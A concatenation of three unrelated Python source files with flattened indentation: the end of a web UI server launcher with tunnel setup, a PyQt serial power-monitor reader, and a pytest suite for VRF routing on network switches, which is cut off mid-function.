if auth is not None or app.interface.encrypt:
raise ValueError("Cannot queue with encryption or authentication enabled.")
queue.init()
app.queue_thread = threading.Thread(target=queue_thread, args=(path_to_local_server,))
app.queue_thread.start()
if interface.save_to is not None:
interface.save_to["port"] = port
app_kwargs = {"port": port, "host": server_name}
if ssl:
app_kwargs["ssl_context"] = ssl
thread = threading.Thread(target=app.run,
kwargs=app_kwargs,
daemon=True)
thread.start()
return port, path_to_local_server, app, thread
def get_state():
return session.get("state")
def set_state(value):
session["state"] = value
def close_server(process):
process.terminate()
process.join()
def url_request(url):
try:
req = urllib.request.Request(
url=url, headers={"content-type": "application/json"}
)
res = urllib.request.urlopen(req, timeout=10)
return res
except Exception as e:
raise RuntimeError(str(e))
def setup_tunnel(local_server_port, endpoint):
response = url_request(
endpoint + '/v1/tunnel-request' if endpoint is not None else GRADIO_API_SERVER)
if response and response.code == 200:
try:
payload = json.loads(response.read().decode("utf-8"))[0]
return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
except Exception as e:
raise RuntimeError(str(e))
def url_ok(url):
try:
for _ in range(5):
time.sleep(.500)
r = requests.head(url, timeout=3)
if r.status_code in (200, 401, 302): # 401 or 302 if auth is set
return True
except (ConnectionError, requests.exceptions.ConnectionError):
return False
|
powermonitor.py | import glob
from queue import Queue
import sys
import threading
import time
from PyQt5.QtCore import QObject, pyqtSignal
import serial
print("Power Monitor 0.1")
class PowerValue:
def __init__(self):
self.busvoltage = 0
self.current_ma = 0
self.power = 0
self.created = time.time()
class PowerMonitor(QObject):
# signals
thread_started = pyqtSignal()
thread_stopped = pyqtSignal()
measurement_started = pyqtSignal()
measurement_stopped = pyqtSignal()
events_per_second = pyqtSignal(float)
def __init__(self):
QObject.__init__(self)
self.ser = None
self.data = Queue()
self.running = False
self.measurementRunning = False
self.countEvents = 0
def listPorts(self):
""" Lists serial port names
:raises EnvironmentError:
On unsupported or unknown platforms
:returns:
A list of the serial ports available on the system
"""
if sys.platform.startswith('win'):
ports = ['COM%s' % (i + 1) for i in range(256)]
elif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):
# this excludes your current terminal "/dev/tty"
ports = glob.glob('/dev/tty[A-Za-z]*')
elif sys.platform.startswith('darwin'):
ports = glob.glob('/dev/tty.*')
else:
raise EnvironmentError('Unsupported platform')
result = []
for port in ports:
try:
s = serial.Serial(port)
s.close()
result.append(port)
except (OSError, serial.SerialException):
pass
return result
def startThread(self, port):
if (not self.ser == None):
# end old connection if available
self.ser.close()
self.ser = serial.Serial(port, 115200, timeout=1)
self.thread = threading.Thread(target=self.run_internal)
self.thread.start()
self.thread_started.emit()
self.running = True
def run_internal(self):
self.stop = False
while (self.stop == False):
buf = self.ser.readline()
if len(buf) == 5:
buf = buf[:4]
if buf.decode('utf-8') == "SACK":
# start acknowledged
self.measurementRunning = True
self.measurement_started.emit()
elif buf.decode('utf-8') == "PACK":
# stop acknowledged
self.measurementRunning = False
self.measurement_stopped.emit()
# reset count for next measurement
self.countEvents = 0
elif len(buf) == 8 and buf[0] == 68:
# if line is a data line (D = 68)
if self.countEvents == 0:
start = time.time()
self.countEvents += 1
if self.countEvents % 1000 == 0:
diff = time.time() - start
eps = (self.countEvents / diff)
#print("eps: " + str(eps))
self.events_per_second.emit(eps)
pv = PowerValue()
pv.busvoltage = ((buf[1] << 8) | (buf[2])) * 0.001
pv.current_ma = ((buf[3] << 8) | (buf[4])) / 10
pv.power = ((buf[5] << 8) | (buf[6]))
#print("{} V, {} mA, {} W".format(pv.busvoltage, pv.current_ma, pv.power))
self.data.put(pv)
elif len(buf) > 0:
# no data received, print it
print(buf)
# only count times after data has been received
if self.countEvents > 0:
self.countEvents += 1
pass
# wait until all outgoing data is sent
self.ser.flush()
while self.ser.out_waiting > 0:
pass
self.thread_stopped.emit()
self.running = False
self.ser.close()
def isThreadRunning(self):
return self.running
def stopThread(self):
self.stop = True
def startMeasurement(self):
if self.isThreadRunning():
print("start mes")
self.ser.write('S'.encode('utf-8')) # S
self.ser.flush()
def stopMeasurement(self):
if self.isThreadRunning():
print("stop mes")
self.ser.write('P'.encode('utf-8')) # P
self.ser.flush()
self.measurementRunning = False
def isMeasurementRunning(self):
return self.measurementRunning |
test_vrf.py | import sys
import time
import threading
import Queue
import yaml
import json
import random
import logging
import tempfile
import traceback
from collections import OrderedDict
from natsort import natsorted
from netaddr import IPNetwork
import pytest
from tests.common.fixtures.ptfhost_utils import copy_ptftests_directory # lgtm[py/unused-import]
from tests.common.fixtures.ptfhost_utils import change_mac_addresses # lgtm[py/unused-import]
from tests.common.storage_backend.backend_utils import skip_test_module_over_backend_topologies # lgtm[py/unused-import]
from tests.ptf_runner import ptf_runner
from tests.common.utilities import wait_until
from tests.common.reboot import reboot
"""
During vrf testing, a vrf basic configuration need to be setup before any tests,
and cleanup after all tests. Both of the two tasks should be called only once.
A module-scoped fixture `setup_vrf` is added to accompilsh the setup/cleanup tasks.
We want to use ansible_adhoc/tbinfo fixtures during the setup/cleanup stages, but
1. Injecting fixtures to xunit-style setup/teardown functions is not support by
[now](https://github.com/pytest-dev/pytest/issues/5289).
2. Calling a fixture function directly is deprecated.
So, we prefer a fixture rather than xunit-style setup/teardown functions.
"""
pytestmark = [
pytest.mark.topology('t0')
]
logger = logging.getLogger(__name__)
# global variables
g_vars = {}
PTF_TEST_PORT_MAP = '/root/ptf_test_port_map.json'
# helper functions
def get_vlan_members(vlan_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['VLAN_MEMBER'].keys():
v, port = m.split('|')
if vlan_name == v:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
def get_pc_members(portchannel_name, cfg_facts):
tmp_member_list = []
for m in cfg_facts['PORTCHANNEL_MEMBER'].keys():
pc, port = m.split('|')
if portchannel_name == pc:
tmp_member_list.append(port)
return natsorted(tmp_member_list)
def get_intf_ips(interface_name, cfg_facts):
prefix_to_intf_table_map = {
'Vlan': 'VLAN_INTERFACE',
'PortChannel': 'PORTCHANNEL_INTERFACE',
'Ethernet': 'INTERFACE',
'Loopback': 'LOOPBACK_INTERFACE'
}
intf_table_name = None
ip_facts = {
'ipv4': [],
'ipv6': []
}
for pfx, t_name in prefix_to_intf_table_map.iteritems():
if pfx in interface_name:
intf_table_name = t_name
break
if intf_table_name is None:
return ip_facts
for intf in cfg_facts[intf_table_name]:
if '|' in intf:
if_name, ip = intf.split('|')
if if_name == interface_name:
ip = IPNetwork(ip)
if ip.version == 4:
ip_facts['ipv4'].append(ip)
else:
ip_facts['ipv6'].append(ip)
return ip_facts
def get_cfg_facts(duthost):
tmp_facts = json.loads(duthost.shell("sonic-cfggen -d --print-data")['stdout']) # return config db contents(running-config)
port_name_list_sorted = natsorted(tmp_facts['PORT'].keys())
port_index_map = {}
for idx, val in enumerate(port_name_list_sorted):
port_index_map[val] = idx
tmp_facts['config_port_indices'] = port_index_map
return tmp_facts
def get_vrf_intfs(cfg_facts):
intf_tables = ['INTERFACE', 'PORTCHANNEL_INTERFACE', 'VLAN_INTERFACE', 'LOOPBACK_INTERFACE']
vrf_intfs = {}
for table in intf_tables:
for intf, attrs in cfg_facts.get(table, {}).iteritems():
if '|' not in intf:
vrf = attrs['vrf_name']
if vrf not in vrf_intfs:
vrf_intfs[vrf] = {}
vrf_intfs[vrf][intf] = get_intf_ips(intf, cfg_facts)
return vrf_intfs
def get_vrf_ports(cfg_facts):
'''
:return: vrf_member_port_indices, vrf_intf_member_port_indices
'''
vlan_member = cfg_facts['VLAN_MEMBER'].keys()
pc_member = cfg_facts['PORTCHANNEL_MEMBER'].keys()
member = vlan_member + pc_member
vrf_intf_member_port_indices = {}
vrf_member_port_indices = {}
vrf_intfs = get_vrf_intfs(cfg_facts)
for vrf, intfs in vrf_intfs.iteritems():
vrf_intf_member_port_indices[vrf] = {}
vrf_member_port_indices[vrf] = []
for intf in intfs:
vrf_intf_member_port_indices[vrf][intf] = natsorted(
[ cfg_facts['config_port_indices'][m.split('|')[1]] for m in filter(lambda m: intf in m, member) ]
)
vrf_member_port_indices[vrf].extend(vrf_intf_member_port_indices[vrf][intf])
vrf_member_port_indices[vrf] = natsorted(vrf_member_port_indices[vrf])
return vrf_intf_member_port_indices, vrf_member_port_indices
def ex_ptf_runner(ptf_runner, exc_queue, **kwargs):
'''
With this simple warpper function, we could use a Queue to store the
exception infos and check it later in main thread.
Example:
refer to test 'test_vrf_swss_warm_reboot'
'''
try:
ptf_runner(**kwargs)
except Exception:
exc_queue.put(sys.exc_info())
def finalize_warmboot(duthost, comp_list=None, retry=30, interval=5):
'''
Check if componets finish warmboot(reconciled).
'''
DEFAULT_COMPONENT_LIST = ['orchagent', 'neighsyncd']
EXP_STATE = 'reconciled'
comp_list = comp_list or DEFAULT_COMPONENT_LIST
# wait up to $retry * $interval secs
for _ in range(retry):
for comp in comp_list:
state = duthost.shell('/usr/bin/redis-cli -n 6 hget "WARM_RESTART_TABLE|{}" state'.format(comp), module_ignore_errors=True)['stdout']
logger.info("{} : {}".format(comp, state))
if EXP_STATE == state:
comp_list.remove(comp)
if len(comp_list) == 0:
break
time.sleep(interval)
logger.info("Slept {} seconds!".format(interval))
return comp_list
def check_interface_status(duthost, up_ports):
intf_facts = duthost.interface_facts(up_ports=up_ports)['ansible_facts']
if len(intf_facts['ansible_interface_link_down_ports']) != 0:
logger.info("Some ports went down: {} ...".format(intf_facts['ansible_interface_link_down_ports']))
return False
return True
def check_bgp_peer_state(duthost, vrf, peer_ip, expected_state):
peer_info = json.loads(duthost.shell("vtysh -c 'show bgp vrf {} neighbors {} json'".format(vrf, peer_ip))['stdout'])
logger.debug("Vrf {} bgp peer {} infos: {}".format(vrf, peer_ip, peer_info))
try:
peer_state = peer_info[peer_ip].get('bgpState', 'Unknown')
except Exception as e:
peer_state = 'Unknown'
if peer_state != expected_state:
logger.info("Vrf {} bgp peer {} is {}, exptected {}!".format(vrf, peer_ip, peer_state, expected_state))
return False
return True
def check_bgp_facts(duthost, cfg_facts):
result = {}
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
vrf = 'default'
peer_ip = neigh
else:
vrf, peer_ip = neigh.split('|')
result[(vrf, peer_ip)] = check_bgp_peer_state(duthost, vrf, peer_ip, expected_state='Established')
return all(result.values())
def setup_vrf_cfg(duthost, localhost, cfg_facts):
'''
setup vrf configuration on dut before test suite
'''
# FIXME
# For vrf testing, we should create a new vrf topology
# might named to be 't0-vrf', deploy with minigraph templates.
#
# But currently vrf related schema does not properly define in minigraph.
# So we generate and deploy vrf basic configuration with a vrf jinja2 template,
# later should move to minigraph or a better way(VRF and BGP cli).
from copy import deepcopy
cfg_t0 = deepcopy(cfg_facts)
cfg_t0.pop('config_port_indices', None)
# get members from Vlan1000, and move half of them to Vlan2000 in vrf basic cfg
ports = get_vlan_members('Vlan1000', cfg_facts)
vlan_ports = {'Vlan1000': ports[:len(ports)/2],
'Vlan2000': ports[len(ports)/2:]}
extra_vars = {'cfg_t0': cfg_t0,
'vlan_ports': vlan_ports}
duthost.host.options['variable_manager'].extra_vars.update(extra_vars)
duthost.template(src="vrf/vrf_config_db.j2", dest="/tmp/config_db_vrf.json")
duthost.shell("cp /tmp/config_db_vrf.json /etc/sonic/config_db.json")
reboot(duthost, localhost)
def setup_vlan_peer(duthost, ptfhost, cfg_facts):
'''
setup vlan peer ip addresses on peer port(ptf).
Example:
vid local-port peer-port peer-macvlan-dev peer-namespace peer-ip
Vlan1000 Ethernet1 eth1 e1mv1 ns1000 192.168.0.2/21
FC00:192::2/117
Vlan2000 Ethernet13 eth13 e13mv1 ns2000 192.168.0.2/21
FC00:192::2/117
'''
vlan_peer_ips = {}
vlan_peer_vrf2ns_map = {}
for vlan in cfg_facts['VLAN'].keys():
ns = 'ns' + vlan.strip('Vlan')
vrf = cfg_facts['VLAN_INTERFACE'][vlan]['vrf_name']
vlan_peer_vrf2ns_map[vrf] = ns
vlan_port = get_vlan_members(vlan, cfg_facts)[0]
vlan_peer_port = cfg_facts['config_port_indices'][vlan_port]
# deploy peer namespace on ptf
ptfhost.shell("ip netns add {}".format(ns))
# bind port to namespace
ptfhost.shell("ip link add e{}mv1 link eth{} type macvlan mode bridge".format(vlan_peer_port, vlan_peer_port))
ptfhost.shell("ip link set e{}mv1 netns {}".format(vlan_peer_port, ns))
ptfhost.shell("ip netns exec {} ip link set dev e{}mv1 up".format(ns, vlan_peer_port))
# setup peer ip on ptf
if (vrf, vlan_peer_port) not in vlan_peer_ips:
vlan_peer_ips[(vrf, vlan_peer_port)] = {'ipv4': [], 'ipv6': []}
vlan_ips = get_intf_ips(vlan, cfg_facts)
for ver, ips in vlan_ips.iteritems():
for ip in ips:
neigh_ip = IPNetwork("{}/{}".format(ip.ip+1, ip.prefixlen))
ptfhost.shell("ip netns exec {} ip address add {} dev e{}mv1".format(ns, neigh_ip, vlan_peer_port))
# ping to trigger neigh resolving
ping_cmd = 'ping' if neigh_ip.version ==4 else 'ping6'
duthost.shell("{} -I {} {} -c 1 -f -W1".format(ping_cmd, vrf, neigh_ip.ip), module_ignore_errors=True)
vlan_peer_ips[(vrf, vlan_peer_port)][ver].append(neigh_ip)
return vlan_peer_ips, vlan_peer_vrf2ns_map
def cleanup_vlan_peer(ptfhost, vlan_peer_vrf2ns_map):
for vrf, ns in vlan_peer_vrf2ns_map.iteritems():
ptfhost.shell("ip netns del {}".format(ns))
def gen_vrf_fib_file(vrf, tbinfo, ptfhost, render_file, dst_intfs=None, \
limited_podset_number=10, limited_tor_number=10):
dst_intfs = dst_intfs if dst_intfs else get_default_vrf_fib_dst_intfs(vrf, tbinfo)
extra_vars = {
'testbed_type': tbinfo['topo']['name'],
'props': g_vars['props'],
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'dst_intfs': dst_intfs,
'limited_podset_number': limited_podset_number,
'limited_tor_number': limited_tor_number
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_fib.j2", dest=render_file)
def get_default_vrf_fib_dst_intfs(vrf, tbinfo):
'''
Get default vrf fib destination interfaces(PortChannels) according to the given vrf.
The test configuration is dynamic and can work with 4 and 8 PCs as the number of VMs.
The first half of PCs are related to Vrf1 and the second to Vrf2.
'''
dst_intfs = []
vms_num = len(tbinfo['topo']['properties']['topology']['VMs'])
if vrf == 'Vrf1':
dst_intfs_range = list(range(1, int(vms_num / 2) + 1))
else:
dst_intfs_range = list(range(int(vms_num / 2) + 1, vms_num + 1))
for intfs_num in dst_intfs_range:
dst_intfs.append('PortChannel000{}'.format(intfs_num))
return dst_intfs
def gen_vrf_neigh_file(vrf, ptfhost, render_file):
extra_vars = {
'intf_member_indices': g_vars['vrf_intf_member_port_indices'][vrf],
'intf_ips': g_vars['vrf_intfs'][vrf]
}
ptfhost.host.options['variable_manager'].extra_vars.update(extra_vars)
ptfhost.template(src="vrf/vrf_neigh.j2", dest=render_file)
def gen_specific_neigh_file(dst_ips, dst_ports, render_file, ptfhost):
dst_ports = [str(port) for port_list in dst_ports for port in port_list]
tmp_file = tempfile.NamedTemporaryFile()
for ip in dst_ips:
tmp_file.write('{} [{}]\n'.format(ip, ' '.join(dst_ports)))
tmp_file.flush()
ptfhost.copy(src=tmp_file.name, dest=render_file)
# For dualtor
def get_dut_enabled_ptf_ports(tbinfo, hostname):
dut_index = str(tbinfo['duts_map'][hostname])
ptf_ports = set(tbinfo['topo']['ptf_map'][dut_index].values())
disabled_ports = set()
if dut_index in tbinfo['topo']['ptf_map_disabled']:
disabled_ports = set(tbinfo['topo']['ptf_map_disabled'][dut_index].values())
return ptf_ports - disabled_ports
# For dualtor
def get_dut_vlan_ptf_ports(mg_facts):
ports = set()
for vlan in mg_facts['minigraph_vlans']:
for member in mg_facts['minigraph_vlans'][vlan]['members']:
ports.add(mg_facts['minigraph_port_indices'][member])
return ports
# fixtures
@pytest.fixture(scope="module")
def dut_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return duthost.facts
@pytest.fixture(scope="module")
def cfg_facts(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
return get_cfg_facts(duthost)
def restore_config_db(localhost, duthost, ptfhost):
# In case something went wrong in previous reboot, wait until the DUT is accessible to ensure that
# the `mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json` is executed on DUT.
# If the DUT is still inaccessible after timeout, we may have already lose the DUT. Something sad happened.
localhost.wait_for(host=g_vars["dut_ip"],
port=22,
state='started',
search_regex='OpenSSH_[\\w\\.]+ Debian',
timeout=180) # Similiar approach to increase the chance that the next line get executed.
duthost.shell("mv /etc/sonic/config_db.json.bak /etc/sonic/config_db.json")
reboot(duthost, localhost)
if 'vlan_peer_vrf2ns_map' in g_vars:
cleanup_vlan_peer(ptfhost, g_vars['vlan_peer_vrf2ns_map'])
@pytest.fixture(scope="module", autouse=True)
def setup_vrf(tbinfo, duthosts, rand_one_dut_hostname, ptfhost, localhost, skip_test_module_over_backend_topologies):
duthost = duthosts[rand_one_dut_hostname]
# backup config_db.json
duthost.shell("mv /etc/sonic/config_db.json /etc/sonic/config_db.json.bak")
## Setup global variables
global g_vars
try:
## Setup dut
g_vars["dut_ip"] = duthost.host.options["inventory_manager"].get_host(duthost.hostname).vars["ansible_host"]
duthost.critical_services = ["swss", "syncd", "database", "teamd", "bgp"] # Don't care about 'pmon' and 'lldp' here
cfg_t0 = get_cfg_facts(duthost) # generate cfg_facts for t0 topo
setup_vrf_cfg(duthost, localhost, cfg_t0)
# Generate cfg_facts for t0-vrf topo, should not use cfg_facts fixture here. Otherwise, the cfg_facts
# fixture will be executed before setup_vrf and will have the original non-VRF config facts.
cfg_facts = get_cfg_facts(duthost)
duthost.shell("sonic-clear arp")
duthost.shell("sonic-clear nd")
duthost.shell("sonic-clear fdb all")
with open("../ansible/vars/topo_{}.yml".format(tbinfo['topo']['name']), 'r') as fh:
g_vars['topo_properties'] = yaml.safe_load(fh)
g_vars['props'] = g_vars['topo_properties']['configuration_properties']['common']
g_vars['vlan_peer_ips'], g_vars['vlan_peer_vrf2ns_map'] = setup_vlan_peer(duthost, ptfhost, cfg_facts)
g_vars['vrf_intfs'] = get_vrf_intfs(cfg_facts)
g_vars['vrf_intf_member_port_indices'], g_vars['vrf_member_port_indices'] = get_vrf_ports(cfg_facts)
except Exception as e:
# Ensure that config_db is restored.
# If exception is raised in setup, the teardown code won't be executed. That's why we need to capture
# exception and do cleanup here in setup part (code before 'yield').
logger.error("Exception raised in setup: {}".format(repr(e)))
logger.error(json.dumps(traceback.format_exception(*sys.exc_info()), indent=2))
restore_config_db(localhost, duthost, ptfhost)
# Setup failed. There is no point to continue running the cases.
pytest.fail("VRF testing setup failed") # If this line is hit, script execution will stop here
# --------------------- Testing -----------------------
yield
# --------------------- Teardown -----------------------
restore_config_db(localhost, duthost, ptfhost)
@pytest.fixture
def partial_ptf_runner(request, ptfhost, tbinfo, dut_facts):
def _partial_ptf_runner(testname, **kwargs):
params = {'testbed_type': tbinfo['topo']['name'],
'router_macs': [dut_facts['router_mac']],
'ptf_test_port_map': PTF_TEST_PORT_MAP
}
params.update(kwargs)
ptf_runner(host=ptfhost,
testdir="ptftests",
platform_dir="ptftests",
testname=testname,
params=params,
log_file="/tmp/{}.{}.log".format(request.cls.__name__, request.function.__name__))
return _partial_ptf_runner
@pytest.fixture(scope="module")
def mg_facts(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
return mg_facts
# For dualtor
@pytest.fixture(scope='module')
def vlan_mac(duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
config_facts = duthost.config_facts(host=duthost.hostname, source='running')['ansible_facts']
dut_vlan_mac = None
for vlan in config_facts.get('VLAN', {}).values():
if 'mac' in vlan:
logger.debug('Found VLAN mac')
dut_vlan_mac = vlan['mac']
break
if not dut_vlan_mac:
logger.debug('No VLAN mac, use default router_mac')
dut_vlan_mac = duthost.facts['router_mac']
return dut_vlan_mac
@pytest.fixture(scope="module", autouse=True)
def ptf_test_port_map(tbinfo, duthosts, mg_facts, ptfhost, rand_one_dut_hostname, vlan_mac):
duthost = duthosts[rand_one_dut_hostname]
ptf_test_port_map = {}
enabled_ptf_ports = get_dut_enabled_ptf_ports(tbinfo, duthost.hostname)
vlan_ptf_ports = get_dut_vlan_ptf_ports(mg_facts)
for port in enabled_ptf_ports:
if port in vlan_ptf_ports:
target_mac = vlan_mac
else:
target_mac = duthost.facts['router_mac']
ptf_test_port_map[str(port)] = {
'target_dut': 0,
'target_mac': target_mac
}
ptfhost.copy(content=json.dumps(ptf_test_port_map), dest=PTF_TEST_PORT_MAP)
@pytest.fixture()
def disable_swss_warm_boot_flag(duthosts, rand_one_dut_hostname):
yield
duthost = duthosts[rand_one_dut_hostname]
swss_flag = duthost.shell("sonic-db-cli STATE_DB HGET 'WARM_RESTART_ENABLE_TABLE|swss' 'enable'")['stdout']
if swss_flag == 'true':
duthost.shell("config warm_restart disable swss")
# tests
class TestVrfCreateAndBind():
def test_vrf_in_kernel(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in kernel
res = duthost.shell("ip link show type vrf | grep Vrf")
for vrf in cfg_facts['VRF'].keys():
assert vrf in res['stdout'], "%s should be created in kernel!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("ip link show %s" % intf)
assert vrf in res['stdout'], "The master dev of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_appl_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in app_db
for vrf in cfg_facts['VRF'].keys():
res = duthost.shell("redis-cli -n 0 keys VRF_TABLE:%s" % vrf)
assert vrf in res['stdout'], "%s should be added in APPL_DB!" % vrf
for vrf, intfs in g_vars['vrf_intfs'].iteritems():
for intf in intfs:
res = duthost.shell("redis-cli -n 0 hgetall \"INTF_TABLE:%s\"" % intf)
assert vrf in res['stdout'], "The vrf of interface %s should be %s !" % (intf, vrf)
def test_vrf_in_asic_db(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
# verify vrf in asic_db
vrf_count = len(cfg_facts['VRF'].keys()) + 1 # plus default virtual router
res = duthost.shell("redis-cli -n 1 keys *VIRTUAL_ROUTER*")
assert len(res['stdout_lines']) == vrf_count
class TestVrfNeigh():
def test_ping_lag_neigh(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
for neigh in cfg_facts['BGP_NEIGHBOR']:
if '|' not in neigh:
continue
vrf, neigh_ip = neigh.split('|')
if IPNetwork(neigh_ip).version == 4:
ping_cmd = 'ping'
else:
ping_cmd = 'ping6'
cmd = "{} {} -I {} -c 3 -f".format(ping_cmd, neigh_ip, vrf)
duthost.shell(cmd)
def test_ping_vlan_neigh(self, duthosts, rand_one_dut_hostname):
duthost = duthosts[rand_one_dut_hostname]
for (vrf, _), neigh_ips in g_vars['vlan_peer_ips'].iteritems():
for ver, ips in neigh_ips.iteritems():
ping_cmd = 'ping' if ver == 'ipv4' else 'ping6'
for ip in ips:
duthost.shell("{} {} -c 3 -I {} -f".format(ping_cmd, ip.ip, vrf))
def test_vrf1_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_neigh_ip_fwd(self, ptfhost, partial_ptf_runner):
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfFib():
@pytest.fixture(scope="class", autouse=True)
def setup_fib_test(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
def test_show_bgp_summary(self, duthosts, rand_one_dut_hostname, cfg_facts):
duthost = duthosts[rand_one_dut_hostname]
props = g_vars['props']
route_count = props['podset_number'] * props['tor_number'] * props['tor_subnet_number']
for vrf in cfg_facts['VRF']:
bgp_summary_string = duthost.shell("vtysh -c 'show bgp vrf {} summary json'".format(vrf))['stdout']
bgp_summary = json.loads(bgp_summary_string)
for info in bgp_summary:
for peer, attr in bgp_summary[info]['peers'].iteritems():
prefix_count = attr['pfxRcd']
# skip ipv6 peers under 'ipv4Unicast' and compare only ipv4 peers under 'ipv4Unicast', and ipv6 peers under 'ipv6Unicast'
if info == "ipv4Unicast" and attr['idType'] == 'ipv6':
continue
else:
assert int(prefix_count) == route_count, "%s should received %s route prefixs!" % (peer, route_count)
def test_vrf1_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf1']
)
def test_vrf2_fib(self, partial_ptf_runner):
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
src_ports=g_vars['vrf_member_port_indices']['Vrf2']
)
class TestVrfIsolation():
@pytest.fixture(scope="class", autouse=True)
def setup_vrf_isolation(self, ptfhost, tbinfo):
gen_vrf_fib_file('Vrf1', tbinfo, ptfhost,
render_file='/tmp/vrf1_fib.txt')
gen_vrf_fib_file('Vrf2', tbinfo, ptfhost,
render_file='/tmp/vrf2_fib.txt')
gen_vrf_neigh_file('Vrf1', ptfhost, render_file="/tmp/vrf1_neigh.txt")
gen_vrf_neigh_file('Vrf2', ptfhost, render_file="/tmp/vrf2_neigh.txt")
def test_neigh_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf2_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_neigh_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FwdTest",
fib_info_files=["/tmp/vrf1_neigh.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
def test_fib_isolate_vrf1_from_vrf2(self, partial_ptf_runner):
# send packets from Vrf1
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf2_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf1']['Vlan1000']
)
def test_fib_isolate_vrf2_from_vrf1(self, partial_ptf_runner):
# send packets from Vrf2
partial_ptf_runner(
testname="vrf_test.FibTest",
fib_info_files=["/tmp/vrf1_fib.txt"],
pkt_action='drop',
src_ports=g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000']
)
class TestVrfAclRedirect():
c_vars = {}
@pytest.fixture(scope="class", autouse=True)
def is_redirect_supported(self, duthosts, rand_one_dut_hostname):
"""
Check if switch supports acl redirect_action, if not then skip test cases
"""
duthost = duthosts[rand_one_dut_hostname]
switch_cap = duthost.switch_capabilities_facts()['ansible_facts']['switch_capabilities']['switch']
res = [capabilities for capabilities in switch_cap.values() if "REDIRECT_ACTION" in capabilities]
if not res:
pytest.skip("Switch does not support ACL REDIRECT_ACTION")
@pytest.fixture(scope="class", autouse=True)
def setup_acl_redirect(self, duthosts, rand_one_dut_hostname, cfg_facts, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# -------- Setup ----------
# make sure neighs from Vlan2000 are resolved
vlan_peer_port = g_vars['vrf_intf_member_port_indices']['Vrf2']['Vlan2000'][0]
vlan_neigh_ip = g_vars['vlan_peer_ips'][('Vrf2', vlan_peer_port)]['ipv4'][0]
duthost.shell("ping {} -I {} -c 3 -f".format(vlan_neigh_ip.ip, 'Vrf2'))
vrf_intf_ports = g_vars['vrf_intf_member_port_indices']
src_ports = [vrf_intf_ports['Vrf1']['Vlan1000'][0]]
dst_ports = [vrf_intf_ports['Vrf1']['PortChannel0001']]
pc1_intf_ips = get_intf_ips('PortChannel0001', cfg_facts)
pc1_v4_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv4'] ]
pc1_v6_neigh_ips = [ str(ip.ip+1) for ip in pc1_intf_ips['ipv6'] ]
pc2_if_name = 'PortChannel0002'
pc2_if_ips = get_intf_ips(pc2_if_name, cfg_facts)
pc2_v4_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv4'] ]
pc2_v6_neigh_ips = [ (pc2_if_name, str(ip.ip+1)) for ip in pc2_if_ips['ipv6'] ]
pc_vrf2_if_name = 'PortChannel000{}'.format(len(tbinfo['topo']['properties']['topology']['VMs']))
pc_vrf2_if_ips = get_intf_ips(pc_vrf2_if_name, cfg_facts)
pc_vrf2_v4_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv4'] ]
pc_vrf2_v6_neigh_ips = [ (pc_vrf2_if_name, str(ip.ip+1)) for ip in pc_vrf2_if_ips['ipv6'] ]
redirect_dst_ips = pc2_v4_neigh_ips + pc_vrf2_v4_neigh_ips
redirect_dst_ipv6s = pc2_v6_neigh_ips + pc_vrf2_v6_neigh_ips
